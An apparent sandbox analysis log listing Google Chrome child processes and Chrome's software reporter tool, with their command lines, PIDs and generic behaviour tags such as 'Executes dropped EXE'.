"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:1
2⤵
PID:1544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
2⤵
PID:4552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
2⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
2⤵
PID:4824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2040 /prefetch:8
2⤵
PID:4708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
2⤵
PID:3332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
2⤵
PID:852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4664 /prefetch:8
2⤵
PID:5944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 /prefetch:8
2⤵
PID:6028

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd4ec4f50,0x7ffdd4ec4f60,0x7ffdd4ec4f70
2⤵
PID:6124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
2⤵
PID:2820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2
2⤵
PID:3828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2396 /prefetch:8
2⤵
PID:1340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2580 /prefetch:1
2⤵
PID:1180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
2⤵
PID:5184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
2⤵
PID:3284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:8
2⤵
PID:528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
2⤵
PID:2172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
2⤵
PID:5272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4516 /prefetch:8
2⤵
PID:4960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:8
2⤵
PID:4856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
2⤵
PID:5220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
2⤵
PID:504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
2⤵
PID:2484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
2⤵
PID:5128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
2⤵
PID:3832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3328 /prefetch:8
2⤵
PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
2⤵
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
2⤵
PID:3380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
2⤵
PID:5376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3152 /prefetch:8
2⤵
PID:1724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:8
2⤵
PID:3316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
2⤵
PID:5400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3576 /prefetch:8
2⤵
PID:1176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
2⤵
PID:3892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
2⤵
PID:4388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
2⤵
PID:4516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
2⤵
PID:3092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:8
2⤵
PID:5724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
2⤵
PID:1748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
2⤵
PID:4508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
2⤵
PID:6028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2900 /prefetch:1
2⤵
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
2⤵
PID:5380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
2⤵
PID:6116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6096 /prefetch:2
2⤵
PID:5592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:8
2⤵
PID:4876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
2⤵
PID:1596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5236 /prefetch:8
2⤵
PID:1076

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe
"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=jrSUwkc+7HF0Z7POAHiq9nzZngi9aMpcjoE3CL5+ --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2636

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=107.294.200 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff742745960,0x7ff742745970,0x7ff742745980
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:752

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_2636_TMFAHKIVFCSIZQSK" --sandboxed-process-id=2 --init-done-notifier=764 --sandbox-mojo-pipe-token=10792194111250585629 --mojo-platform-channel-handle=740 --engine=2
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3236

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_2636_TMFAHKIVFCSIZQSK" --sandboxed-process-id=3 --init-done-notifier=984 --sandbox-mojo-pipe-token=541397359273310799 --mojo-platform-channel-handle=980
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 /prefetch:8
2⤵
PID:5328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
2⤵
PID:1536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:8
2⤵
PID:5220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
2⤵
PID:1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
2⤵
PID:4916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4408 /prefetch:8
2⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
2⤵
PID:2080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
2⤵
PID:2176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:1
2⤵
PID:1088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
2⤵
PID:1808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:8
2⤵
PID:5236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
2⤵
PID:4252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:1
2⤵
PID:3600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2440 /prefetch:1
2⤵
PID:5096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
2⤵
PID:5612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
2⤵
PID:5500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
2⤵
PID:2336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
2⤵
PID:6028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 /prefetch:8
2⤵
PID:5564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3112 /prefetch:8
2⤵
PID:1140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5456 /prefetch:8
2⤵
PID:5124

C:\Program Files\Google\Chrome\Application\chrome.exe
